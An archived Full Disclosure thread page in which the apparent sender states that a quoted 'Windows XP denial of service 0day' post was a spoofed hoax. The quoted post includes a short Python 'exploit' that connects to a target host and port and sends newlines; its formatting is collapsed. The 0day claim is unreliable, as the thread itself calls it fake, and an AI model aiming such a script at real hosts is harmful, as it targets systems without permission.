Full Disclosure mailing list archives

Re: Windows XP denial of service 0day found in CTF exercise

From: adam () infosecinstitute com
Date: Tue, 17 Apr 2012 10:07:05 -0400

Guys, this is a fake release, someone spoofed my email and sent this out
as a joke to mock the wicd release from last week. Please note that if you
click on the links, there is nothing there concerning this.


On 04/17/2012 02:48 AM, Adam Behnke wrote:

Immunity Debugger Remote Denial of Service 0Day Tested against
version 1.76 and 1.80 on Windows XP distributions

Has not been tested for potential privilege escalation vectors.

We first wrote about Immunity Debugger here:
http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/

 Discovered by a student that wishes to remain anonymous in the
course CTF. This 0day exploit for Windows was discovered by a
student in the InfoSec Institute Ethical Hacking class, during an
evening CTF exercise. The student wishes to remain anonymous, he
has contributed a python version of the 0day. A patch that can be
applied to Windows has not been made available. You can find a
python version of the exploit to copy and paste here:


#!/usr/bin/python #Windows XP denial of service 0day exploit
discovered on 4.9.12 by InfoSec Institute student #For full write
up and description go to
http://www.infosecinstitute.com/courses/ethical_hacking_training.html

import sys

import os import time import getopt import socket

class Error(Exception): def __init__(self, error):
self.errorStr=error  def __str__(self): return repr(self.errorStr)

class Exploit():

def __init__(self, targetHost, targetPort): self.targetHost =
targetHost

def exploit(self, targetHost, targetPort):

try: socket.inet_aton(targetHost) s =
socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((targetHost,targetPort)) except socket.error: raise
Error("Unable to exploit (Connect failed.)") sys.exit(0)

# exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
except: raise Error("Unable to exploit (Exploit failed.)")

def usage(): print "[!] Usage:" print "      ( -h, --help ):" print "
Print this message." print " ( --targetHost= ): Target host." print
"            --targetHost=127.0.0.1" print " ( --targetPort= ): Target
port." print "               --targetPort=8888"

def main(): print "[$] Windows XP 0Day" try: opts, args =
getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
"targetPort="]) except getopt.GetoptError, err: # Print help
information and exit: print '[!] Parameter error:' + str(err) #
Will print something like "option -a not recognized" usage()
sys.exit(0)

targetHost=None targetPort=None  for opt, arg in opts: if opt in
("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
would be assuming to say we'll never get here. print "[!] Parameter
error." usage() sys.exit(0)  if not targetHost: print "[!]
Parameter error: targetHost not set." usage() sys.exit(0)

if not targetPort: print "[!] Parameter error: targetPort not
set." usage() sys.exit(0)

exploit = Exploit(targetHost, targetPort)

print "[*] Attempting to exploit:"  try:
exploit.exploit(targetHost, int(targetPort)) except Error as
error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
print "[*] Exploit appears to have worked."

# Standard boilerplate to call the main() function to begin # the
program. if __name__=='__main__': main()



_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq
QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05
7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW
4r6K58WTZ7qR2nTNKnQi
=Uoev
-----END PGP SIGNATURE-----


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Windows XP denial of service 0day found in CTF exercise Adam Behnke (Apr 16)
- Re: Windows XP denial of service 0day found in CTF exercise Memory Vandal (Apr 17)
  - Re: Windows XP denial of service 0day found in CTF exercise Romain Bourdy (Apr 17)
    - Re: Windows XP denial of service 0day found in CTF exercise Memory Vandal (Apr 17)
    - Re: Windows XP denial of service 0day found in CTF exercise Mihamina Rakotomandimby (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise Justin C. Klein Keane (Apr 17)
- Message not available
  - Re: Windows XP denial of service 0day found in CTF exercise adam (Apr 17)
    - Re: Windows XP denial of service 0day found in CTF exercise Terrence (Apr 17)